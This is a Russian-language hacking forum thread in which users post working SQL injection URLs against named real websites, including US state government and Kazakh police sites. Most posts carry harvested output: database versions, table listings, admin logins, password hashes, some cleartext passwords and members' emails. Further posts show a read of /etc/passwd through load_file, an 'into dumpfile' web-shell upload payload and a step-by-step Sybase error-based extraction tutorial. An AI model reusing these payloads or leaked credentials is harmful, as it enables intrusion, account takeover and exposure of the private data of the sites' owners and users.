http://www.numacorptest18.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest19.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest16.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.peak-mechanical.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.taylorgroupofcompanies.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.goldentouchcarpet.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest13.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.firsteditionfirstaid.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.dixondevelopment.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.olympicpavingstone.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.saskatoonprosign.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.goldentouchcarpet.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.highwayagencies.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.chinese.regencycollege.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*






Чтоб в тему:
http://www.attcottonbowl.com/news_room/releases.php?uid=-160'+union+select+1,2,3,4,5,concat_ws(0x3A3a,versi on(),database(),user()),7,8,9,10,11,12,13,14,15,16 +from+user/*

4.1.20::cottonbowl::cottonbowl@localhost

В таблице user поля подобрать не смог (


БОЯН, блин че вам лень посмореть в АНТИБОЯН (http://filefront.jino-net.ru/sql.html) ???!!!!

http://www.dok-4.ru/?id=-9+union+select+1,user(),3,4,5,version()/*

Вот решил сегодня пройтись по besthosting.in.ua
Ну вот результат
Тут все что угодно
и магазины и инфо службы

http://zapodarkami.kiev.ua/pages.php?page=-9+union+select+1,2,3,concat_ws(char(58),TABLE_NAME ,COLUMN_NAME)+from+INFORMATION_SCHEMA.COLUMNS+limi t+190/*

http://www.goldshop.kiev.ua/kat.php?kat=-8+union+select+1,user()/*--

http://avenue.rielt.org/real-estates.php?m=-3+union+select+1,2,3,4,5,6,7,8,user(),10/*

http://ceramica.com.ua/cat2.php?ven=-14++union+select+1,concat_ws(char(58),TABLE_SCHEMA ,TABLE_NAME,COLUMN_NAME),3+from+INFORMATION_SCHEMA .COLUMNS+limit+600/*

http://style9999.kiev.ua/all.php?tov_id=-2953+union+select+1,concat_ws(char(58),TABLE_SCHEM A,TABLE_NAME,COLUMN_NAME,0x3a),3,4,5,6,7,8,9,10,11 ,12+from+INFORMATION_SCHEMA.COLUMNS+limit+1+offset +210/*

http://www.betta.ua/?pageid=-274+union+select+concat_ws(char(58),TABLE_SCHEMA,T ABLE_NAME,COLUMN_NAME)+from+INFORMATION_SCHEMA.COL UMNS+limit+1+offset+210/*

http://ukr-links.kiev.ua/section.php?kat=3&subkat=-28%20union%20select%201,2,3,4,5,concat_ws(char(58) ,id,kat%20,subkat,url,name,info,keywords,status,da te,date2,iphost,view,user,email,nashbutton,ocenka, tmp2%20),7,8,9,10,11,12,13,14,15,16,17%20from%20uk rlinks_baze.site%20limit%209999/*&page=264

http://www.udrua.com/cat2.php?id=-723+union+select+concat_ws(char(58),TABLE_SCHEMA,T ABLE_NAME,COLUMN_NAME),2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20+from+INFORMATION_SCHEMA.COLU MNS+limit+1+offset+310/*

http://www.uakiev.info/section.php?kat=9&subkat=-83+union+select+1,2,3,concat_ws(char(58),TABLE_SCH EMA,TABLE_NAME,COLUMN_NAME),5,6,7,8,9,10,11,12+fro m+INFORMATION_SCHEMA.COLUMNS+limit+1900/*

http://www.webinfo.kiev.ua/kat.php?kat=-6+union+select+1,2,3,4,concat_ws(char(58),TABLE_SC HEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10,11,12,13+f rom+INFORMATION_SCHEMA.COLUMNS+limit+175,1900/*

http://www.webkatalog.kiev.ua/section.php?kat=9&subkat=-79%20union%20select%201,2,3,4,5,concat_ws(char(58) ,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),7,8,9,10,11, 12,13,14,15,16,17%20from%20INFORMATION_SCHEMA.COLU MNS%20limit%20175,190000/*&page=4


кто захочет сам посмотрит

http://www.worldstart.com/tips/tips.php/1862/**/and/**/ascii(lower(substring(version(),1,1)))=0x33/*
Тройка :((( жесть

Нашел сначала пассивную xss, но мне показалось что ресурс содержит еще баги, начал ковырять, в итоге :
Информация о ресурсе смотреть (http://www.alexa.com/data/details/main/ukrindustrial.com)
http://www.ukrindustrial.com/job/?fuseaction=job_employer.viewVacancy&jvr_id=-11029+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws(0x2F,email,pass),13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35+from+users+ limit+2,10--

Кому govHA?)
http://www.dot.ca.gov
http://www.dot.ca.gov/dist07/travel/projects/?pib=det&id=0x2d3127%20union+select+1,2,3,4,5,6,7,8,9,conca t_ws(0x2F,version(),database(),user()),11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
4.0.18-standard-log/d7mediapr/d7media_user@www1.dot.ca.gov

Опять я вам принес govHA =)
http://prairieviewtexas.gov
http://prairieviewtexas.gov/Page.php?id=-1'%20union+select+1,2,3,4,5,6,7/*
5.0.45-community-nt/cpv/cpv@localhost


http://kostanaypolice.kz/ ну а это уже совсем) МВД Республики Казахстан
http://kostanaypolice.kz/index.php?id=0x2d3127)%20union+select+1,2,concat_w s(0x2F,version(),database(),user())/*
4.1.22-log/t314kz_dvd/t314kz_dvduser@localhost


Все за мной приехали :(
Не забывайте меня :D

http://www.fdh.com/news/show.php?id=-52+union+select+1,concat_ws(char(58),user,password ),3,4,5+from+mysql.user+limit+0,10/*
fdhllp:4ee995d07a241a7b

http://www.falltvpreview.com/show.php?id=-134+union+select+1,2,3,4,concat_ws(char(58),TABLE_ SCHEMA,TABLE_NAME,COLUMN_NAME),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26+from+INFOR MATION_SCHEMA.COLUMNS+limit+1--

И такой вопрос какой запрос прописать чтобы создать дамп БД на falltvpreview.com
ну и в первом случае тоже

http://www.airsoftgun.ee/rus/show.php?object=news&mode=full&id=-120+union+select+1,user(),3,Version(),5,6,7+from+I NFORMATION_SCHEMA.COLUMNS+limit+1/*

d10641sa15260@194.204.33.8
5.0.32-Debian_7etch1-log

howtostudy.org

http://www.howtostudy.org/resources_skill.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--

4.1.20:tribble@localhost:howtostudy

rabota.md

http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--

5.0.45:coruptie@localhost:coruptie_rabota

adlogger_adblock
adlogger_channels
adlogger_logfiles
adlogger_users
id
username
password
admin
Id
login
pass
questions
CATEGORIES
RESUMES
VACANCIES
tbl_admin
id
username
password
full_name
is_active
tbl_category
tbl_member
Expirience
Resume


videology.ru

http://www.videology.ru/?id=1&sub=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5/*

5.0.22:videologyr_777@localhost:videologyr_777


Blocks
Booking
Category_inventory
Clients
Flats_category
Items
Organizations
Payments
Room_inventory
Room_prices
Rooms
Service_prices
Services
Users
user_id
login
password
fl_settings
fl_nsi
fl_price
fl_reception
fio
id
name
pass
level
adm_menu
anons
email
images
menu
news
phpbb_attach_quota
phpbb_attachments



http://www.videology.ru/?id=1&sub=-1+union+select+1,2,concat_ws(0x3a,name,pass,level) ,4,5+from+users+limit+0,1/*

alex:f1c1592588411002af340cbaedd6fc33:7 pass:777 mailto:alexvarlamov@yandex.ru
nickdemidov:381987d375be5b533fc11198005ab02d:0

eurekaeurope.com

http://www.eurekaeurope.com/en/tents.php?group=1&product=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4,5/*

4.0.27:nigor@node14.cluster.nxs.nl:nigor


И такой вопрос какой запрос прописать чтобы создать дамп БД на falltvpreview.com
ну и в первом случае тоже

dumpfile

?id=-1+UNION+SELECT+null,0x66726f6d205b2063617368205d20 7768697468206c6f7665202929292929,null,null,null,nu ll+from+accounts+into+dumpfile+'/tmp/shell.php'/*

zhuk.net
http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=@@version--
version Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name() rcb
system_user rcb
http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES)--
по началу в ручную доставал таблицы из information_schema.tables, но потом их количество стало напрягать..и я воспользовался дампером от Elekt'а

RegSubTR
mt_Referrers
mt_RobotLog
mt_Sessions
Questlines
AEventOpl
AEventSost
Aissue
AissueER
AissueNI
AissueTR
AissueYK
Anketa
AnketaAdv
AnketaBelarus
AnketaEmailSubscr
AnketaEmailSubscrTest
AnketaEvents
AnketaEventsPost
AnketaEventsProfiles
AnketaFinUsl
AnketaForum2002
AnketaIvr
AnketaKipr
AnketaKonkurs
AnketaMan
AnketaMoscow
AnketaPlans
AnketaPlans2
AnketaPlans20021
AnketaQuestions
AnketaReg
AnketaRfi
AnketaRostov
AnketaSamara
StatAccessLog
Messages
StatAccessIP
ArtCommCookie
Artcomments
mt_Users
Autorslist
Companieslist
tblZsearch
GuestbookNI
rcbforum
PartsNI
JournalName
SubscriptionPeriod
Person
Users
PartsTR
PartsYK
tblCategory
StatAccessSiteOld
tblForum
tblTopic
StatAccessSite
ConfaName
tblThread
Autors
PartsER
tblAuthor
Companies
GuestbookYK
Parts
GuestbookER
tblPMMessage
UKSpeek
Newsline
tblBuddyList
AnketaSi2
NewsSprings
tblConfiguration
tblDateTimeFormat
tblGroup
UsersRCBComp
tblPoll
Articles
tblPollChoice
AnketaSamara2
tblPollVote
tblEmailNotify
AnketaSi
tblPermissions
AnketaSouth
AnketaSwiss
AnketaTel
AnketaThailand
tblSession
AnketaTR
AnketaYK
tblGuestName
Banners
RegSubscription
tblSmut
Archiveinf
Employes
tblBanList
Guestbook
UsersRole
Koter1
Koter2
Koter3
MailBoxes
Numb
Partadengnew
syssegments
Partadnew
sysconstraints
Post
mt_Config
PostService
mt_Definitions
PostServiceTheme
mt_IPCountry
PostTemp
mt_Keywords
QuestCookie
mt_Names
mt_PageLog
RegSubYK
Regions
mt_PageNames
Questionary
RegSub
mt_ReferrerNames
Интересна таблица Users
http://www.zhuk.net/archive/printyk.asp?aid=2973+or+1=(SELECT+TOP+1+cast(idus+ as+nvarchar)%2B%27%3A%27%2Bcast(UID+as+nvarchar)%2 B%27%3A%27%2Bcast(PW+as+nvarchar)+FROM+USERS+WHERE +idus=1)--
1:admin:p3OK_+
2:sub:2WEdd&
http://www.zhuk.net/adminka.php
Должно быть админка, но от неё нет толку, ибо 403

sdigital.ru
http://www.sdigital.ru/view_product.asp?idProduct=3196&idCategory=14&idSubCategory=81+or+1=@@version--
version Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name() u93901
system_user u93901
имеются таблицы
News
Meta
Pages
Products
SubCategories
UsualCarts
SupProducts
Clients
Admin
Categories
Brands
Currencies

интересная таблица Admin
колонки login и pass
http://www.sdigital.ru/view_product.asp?idProduct=3196&idCategory=14&idSubCategory=81+or+1=(SELECT+TOP+1+cast(login+as+ nvarchar)%2B%27%3A%27%2Bcast(pass+as+nvarchar)+FRO M+Admin)--
Там всего один пользователь, а именно
admin:gbpltw
админка
sdigital.ru/admin

highrollerbonuses.com
http://www.highrollerbonuses.com/high_roller_casino.php?casid=900+union+select+1,co ncat(version(),0x3a,user(),0x3a,database()),3,4,5, 6,7,8,9,10,11,12,13,14,15,16/*
version() 4.0.24_Debian-10sarge3-log
user() junior@localhost
database() junior

casinogenie.co.uk
http://www.casinogenie.co.uk/casino_review.php?casinoid=9999+union+select+1,2,c oncat(version(),0x3a,user(),0x3a,database()),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
version() 5.0.24a-Debian_1-log
user() root@localhost :)
database() casinogenie

интересные таблицы
access_types
admins
admin_id
username
passwd
realname
email
is_active
campaigns
clients
suppliers
adminlogin
blog_author


novinkisezona.ru
http://www.novinkisezona.ru/show_cat2.php?grid=-20+union+select+concat(version(),0x3a,user(),0x3a, database())
version() 4.1.20-lk-log
user() novinkisez@localhost
database() novinkisez

nycpov.com
http://www.nycpov.com/vr_viewer.php?vrid=-5+union+select+1,convert(concat(version(),0x3a,use r(),0x3a,database()),binary),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24
version() 4.1.16-standard-log
user() elwood@zuma.dreamhost.com
database() nycpano

superdyke.com
http://www.superdyke.com/venueprofileview.php?ghid=-38+union+select+1,2,3,4,5,6,7,concat(version(),0x3 a,user(),0x3a,database()),9/*
version() 4.0.27-standard-log
user() super_super@localhost
database() super_superdyke


dekalaser.ru
http://dekalaser.ru/products/index.php?prid=-9+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4,5,6,7,8
version() 5.0.45-log
user() u19010@10.10.223.211
database() u19010

galant-fasad.com.ua
http://galant-fasad.com.ua/content.php?prID=1'
version() 4.0.27-max-log
user() trialog3@v46.valuehost.ru
database() trialog3

planeta-sos.com
http://www.planeta-sos.com/goods.php?prid=999&rid=1+union+select+1,concat(version(),0x3a,user(), 0x3a,database())
version() 4.1.21-log
user() planeta-soscom@81.177.16.51
database() planetasoscom_ssr

posterdb.de
http://www.posterdb.de/detailmovie.php?filmID=-366+union+select+concat(version(),0x3a,user(),0x3a ,database()),2,3,4,5,6,7,8,9/*
version() 5.0.22
user() web207@localhost
database() usr_web207_1
интересные таблицы

person
posteruser
outgroup_members

uni-cis.ru
http://www.uni-cis.ru/news2.php?nid=-358+union+select+1,concat(version(),0x3a,user(),0x 3a,database()),3,4
version() 4.0.23-standard
user() unicis_user@localhost
database() unicis_database

http://www.electroportal.net/vis_directory.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(version(),0x 3a,user(),0x3a,database()),10,11,12,13,14/*
5.0.32-enterprise-gpl-nt:electroportal@localhost:electroportal subdirectory
Вообще сайт ебанутый, с названиями таблиц по 3 слова =\

какой то ит. магазинчек
http://www.allemandi.com/dett_libri.php?id=-183+union+select+1,2,3,4,version(),6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
6.0.2-alpha-community-nt-debug о_О я пропустил выпуск новой версии .. ?

http://www.extenzilla.it/scheda_estensione.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),0,1,2,3,4 ,5,6,7,8,9,0,1,2,3,4/*
5.0.24a-standard-log
есть таблица smf_members, дальше смотреть не стал

http://www.mpa-italia.it/press.php?id=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,version()/*
5.0.45 есть таблица letterit_user
но почему то по запросу

http://www.mpa-italia.it/press.php?id=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,table_schema+from +information_schema.tables+where+table_name=0x276C 657474657269745F7573657227+limit+1,1/* ниче нет, х3 че так.

6.0.2-alpha-community-nt-debug о_О я пропустил выпуск новой версии .. ?

http://www.allemandi.com/dett_libri.php?id=-183+union+select+concat_ws(0x2F,user,password),2+f rom+mysql.user/*




di root/6bb8451457310b70, root/446fb65c7b4daabc, /, pma/78d9048427ff2bb3 мне шоха еще не попадалась , а жаль :( хнык

порноресурс
http://www.largethumb.com/category.php?cat=qwert
поможете доработать?

порноресурс
http://www.largethumb.com/category.php?cat=qwert
поможете доработать?
вопросы в другую ветку https://forum.antichat.ru/thread46016.html

Парочка студий веб дизайна.

Дайте им свои деньги :D

---------------------------------
Авторский сайт "Агарев Сергей", фрилансер походу

_http://www.agarev.com/website.php?id=99999999+and+1=2+union+select+1,con cat(user(),char(58),version(),char(58),database()) ,3,4/*

factorho_agarev@localhost:5.0.45-community:factorho_dbagarev

_http://www.agarev.com/website.php?id=99999999+and+1=2+union+select+1,2,c oncat(lgn,0x3a,pswd),4+from+agrv_user/*

agrv_admin:580c1c296bdae1e2
---------------------------------------
«Витрум-Медиа» Питер

_http://www.vitrum-media.ru/index.php?menu=49&iddoc=104+and+substring(version(),1,1)=4

вывода нет подзапросы

pixheaven.net

http://www.pixheaven.net/galerie.php?id=-1+union+select+1,2,3,4,55,6,concat_ws(0x3a,version (),user(),database()),8,9--



sansihotels.com

http://www.sansihotels.com/hotels.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())/*

5.0.22-Debian_0ubuntu6.06.6-log:sansihotels

columnists.com

http://columnists.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8/*

5.0.45-community:nsncsu2_members@localhost:nsncsu2_column ists


content
faq
forgot
members
memberid
oldMemberID
password
salutation
firstName
middleName
lastName
email
website1
address1Work
members_new
memberid
oldMemberID
password
salutation
newsletter_article
newsletter_edition
billing_type
c_ban_users
c_messages
c_reg_users
c_users
room
username
latin1
u_time
status
cd_payments
conference_payments
countries

members

1:$broder20071:70b9ba4648b497be:DAVID:
2:$dastor10003:7b9ccee24845e5b0:DAVID:
3:$dreiman92037:7788a3c81c8c3794:DAVID:
4:$hentoff10011:5f47e40e7ef5a35d:NAT:

members_new

1:lucy.adams@augustaprep.org:2811994a09d6f1b5:LUCY :
2:lahern@ethocare.org:1489453207d628ef:LESLIE:
3:sralcorn@dejazzd.com:7956b65143aad206:SAM

http://www.pconsult.dp.ua/index.php?pn=-99999+union+select+1,2,3,concat_ws(0x3a,user(),ver sion(),database()),5/*

USER: pconsult_user@localhost
VERSION: 4.1.21-standard-log
DATABASE: pconsult_db

Таблы так и не нашел :(
Кто найдет - отпишитесь.

www.getethical.com
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,version(),3,4,5/*
Доступ к mysql.user
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,concat_ws(0x3a,user,password,hos t),3,4,5+from+mysql.user/* - Рут без пароля, однако подключение только с локалхоста. Хотя существует юзер: leith:663ebe8f58ee1b6c:% - откуда угодно - но учитывая желание залить шелл - не интересно:)
file_priv=Y
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,file_priv,3,4,5+from+mysql.user+ where+user=left(user(),locate(0x40,user())-1)/*
/etc/passwd
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,load_file('/etc/passwd'),3,4,5/*
И кавычки не экранируются=) кажется можно попробовать залить шелл.
httpd.conf
http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3,4,5+from+mysql.user/*
Однако папочки /var/www/getethical/public_html/ не нашлось(((( Может кто-то подкажет где можно посмотреть полный путь к сайту?
Ну и напоследок - есть интересная таблица customers

Dima-k17
всё бы хорошо ,но это баян
_http://forum.antichat.ru/showpost.php?p=287675&postcount=501

Dima-k17
всё бы хорошо ,но это баян
_http://forum.antichat.ru/showpost.php?p=287675&postcount=501
Сорри, смотрел тут, не нашел, посему и запостил:
http://filefront.jino-net.ru/sql.html
Однако у него без file_priv'a :-)
исправляюсь:
http://adena.ru/keys.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,table_name,22+from+information_sc hema.tables+limit+0,1/*

Горе-кодеры
http://valera.asf.ru/perl/cookbook/cont.php?id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(conca t_ws(0x3a,version(),user(),database()),0x71),0x71)/*

Парочка хостеров:

Ни у кого там сайтов нет ? :D

Этот смешной, там чудо защита какая-то,по ходу на скобки пишет: "I don't like you...", можно подумать я в восторге :D

_http://fairhost.ru/article.php?sid=-13+union+select+1,2,3,4,5,6,7,8,@@version,0,11/*

4.0.27-max-log

-------------------------------------
_http://www.alestar.biz/index.php?id1=5+and+1=2+union+select+1,2,concat(us er(),char(58),version(),char(58),database()),4,5,6/*

alesta_ya@localhost:4.1.22:alesta_db1

вывод в исходник
--------------------------------------
Таблицы не подобрал

http://library.informdon.ru/

http://library.informdon.ru/?p=4&sp=32&tp=2345432+union+select+0,pass,2,3,4,5,6,name+from +admin

administrator:2001
http://informdon.ru/library/admin/

OS :Windows NT A10 5.2 build 3790

там загрузка файла тоже есть имхо

http://www.rogerssprayers.com/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
admin:3ff9f71df33fff2b789abc66f564a708

Белорусский сайт любителей хоккея. :)

http://www.belarushockey.com/?commid=-2141'+union+select+1,2,3,concat_ws(char(35),versio n(),database(),user())/*

4.0.24_Debian-10sarge1-log#belarushockeycom#belarushockeycom@localhost

http://www.belarushockey.com/?commid=-2141'+union+select+1,nick,mail,message+from+commen t/*

http://www.belarushockey.com/?commid=-2141'+union+select+1,author,title,text+from+news+w here+id=2142/*

http://www.apevia.com/category.php?cid=-14+union+select+1,concat_ws(0x3A3a,user(),database (),version()),3/*
Есть таблица users.
Поля не подобрал.

aspire@localhost::aspire::4.1.22-log

когдато тоже ломал сайт этот

www.women-law.org

wapwebsite@localhost::4.1.22-standard::wapweb

http://www.women-law.org/program_service.php?pid=-14+union+select+1,2,concat_ws(0x3A3a,username,pass word),4,5+from+users/*

melitokagan::ed0c2fc45dd1662774ac8e8a86b9167d: m3k605
project::5f212e25801eb5a9fd02a0ee62e2fbb9: tap1982

www.masterphoto.ru

5.0.45-community/master_masterpho@localhost/master_masterphoto

http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(name,char(58),email),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user/*


Таблицы:
user
Поля:
name
email

Поля с паролями не подобрал

www.masterphoto.ru

5.0.45-community/master_masterpho@localhost/master_masterphoto

http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(name,char(58),email),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user/*


Таблицы:
user
Поля:
name
email

Поля с паролями не подобрал


http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(user_password,char(58)),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+php bb_users%20where%20user_id=2/*

masterphoto:786c2704f76e06e44aad1e0213d26018:gbcbr henj

http://www.masterphoto.ru/forum/admin/

там еше и форум есть а я спать :o

Крупный хостиг в зоне кз
http://user.kz/files/cifry.php?sid=-9965481+union+select+1,2,3,4,5,6,7/*

http://handbook.ecu.edu.au/CourseStructure.asp?disyear=2008+and+1=1--&CID=1&USID=0&UCID=0&UID=0&Ver=0&HB=HB&SC=

ReVOLVeR
Хорош прикалываться
1.баян
2.вобще люкс: твой пост
_http://forum.antichat.ru/showpost.php?p=621958&postcount=5162

Хм, чето только мускул один, есть же и другие: Postgre, Mssql, Sybase и т.д. осбенно мало на форумах постят про Sybase...
вобщем Sybase использует Transact-SQL, как например MS Access и MSSQL но они отличаются немного, вот пример:
Получаем данные через вывод сообщения об ошибке приведения типов.
версия:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(@@version))--Adaptive Server Enterprise/12.5.0.3/EBF 11450 ESD#4/P/Linux Intel/Linux 2.4.18-18.7.xsmp i686/rel12503/1940/32-bit/OPT/Sun Sep 21 03:10:00 2003
текущий пользователь:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(user_name()))--rf
имена бд:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+mast er..syslogins))--sybsystemdb
следующее имя бд:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+mast er..syslogins+where+dbname+not+in+(0x7379627379737 4656D6462)))--rfprod
здесь 0x73796273797374656D6462=hex('sybsystemdb')

следующее имя:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(dbname)+from+mast er..syslogins+where+dbname+not+in+(0x726670726F64, 0x73796273797374656D6462)))--master
0x726670726F64=hex('rfprod') и т.д.

узнаем таблицы в бд rfprod (в других по аналогии):
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||conve rt(char,id))+from+rfprod..sysobjects+where+type=0x 55))--wifi_reactions:1785877529
тут надо пояснить, || -знак конкатенации (объединения) в sybase, convert(char,id) нужен для того, что бы привести числовое поле id (очень нужное) к символьному типу, иначе возникнет ошибка несоответствия типов, from+rfprod..sysobjects означает то, что мы выбираем значения из системной таблицы sysobjects базы данных rfprod, в этой таблице хранятся записи об объектах этой бд, но нам нужны не все объекты, а только пользовательские таблицы, они имеют тип U, hex('U')=0x55 (where+type=0x55) надеюсь с этим все понятно

узнаем имя следующей таблицы:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||conve rt(char,id))+from+rfprod..sysobjects+where+type=0x 55+and+id+not+in+(1785877529)))--wifi_inscriptions:1753877415
поясню, т.к. id уникально, для перебора удобнее использовать именно его

узнаем поля таблицы wifi_reactions (id=1785877529) (другие таблицы по аналогии):
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||conve rt(char,colid))+from+rfprod..syscolumns+where+id=1 785877529))--ville:4
Тут тоже нужно пояснить: colid - это идентификационный номер поля, он не несет смысловой нагрузги, но его удобно использовать при переборе, from+rfprod..syscolumns означает то, что мы выбираем значения из системной таблицы syscolumns базы данных rfprod, в этой таблице хранятся записи об колонках этой бд! (а не только одной таблицы), where+id=1785877529 - указывает колонки какой таблицы выбирать, я ранее говорил, что id таблицы очень важное для нас значение, так вот определение того, к какой таблице принадлежит имя поля, происходит именно по id таблицы и только по id

узнаем имя следующего поля:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(name||0x3a||conve rt(char,colid))+from+rfprod..syscolumns+where+id=1 785877529+and+colid+not+in+(4)))--reactions:5 и т.д

получаем данные из таблицы wifi_reactions:
http://www.radiofrance.fr/rf/documentation/dossiers/liens/?rid=convert(numeric,(select+max(convert(varchar,r eactions)||0x3a||ville)+from+rfprod..wifi_reaction s))--utilisateur du wifi depuis ces:grenoble что это такое, фиг его знает, но нам важны не данные, а принцип получения данных, convert(varchar,reactions) - нужен для того, что бы привести данные из поля reactions, которое имеет тип VARBINARY, к типу varchar для совместимости, если этого не сделать, появится ошибка несовместимости типов

